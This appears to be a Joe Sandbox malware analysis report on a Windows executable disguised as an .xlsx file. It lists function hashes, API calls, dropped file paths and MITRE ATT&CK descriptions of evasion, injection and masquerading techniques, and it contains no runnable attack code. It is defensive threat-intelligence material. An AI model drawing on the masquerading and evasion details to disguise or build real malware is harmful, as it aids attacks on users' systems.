Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54

Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
CloseHandle.KERNEL32(?), ref: 004056F5

Strings

Error launching installer, xrefs: 004056D6

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D

Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44

Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44

Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44

Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84

Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44

Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44

Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44

Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 09-FD-94.03.60.175.07.xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BooConf.ini

C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsqD111.tmp

C:\Users\user\AppData\Local\Temp\tmc.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\Aflare.Enk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\Impieties200.bjr

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\firsaarsfdselsdags.luv

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\portitor.win

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\affodill.Hav

C:\Users\user\subacidity.lnk

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
09-FD-94.03.60.175.07.xlsx.exe

Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383
stringfilecomCOMMON

Function 00405331 Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F6A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 004057D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403CC2 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Function 0040391F Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004051F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142
fileCOMMON

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00405E15 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Function 00405BE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON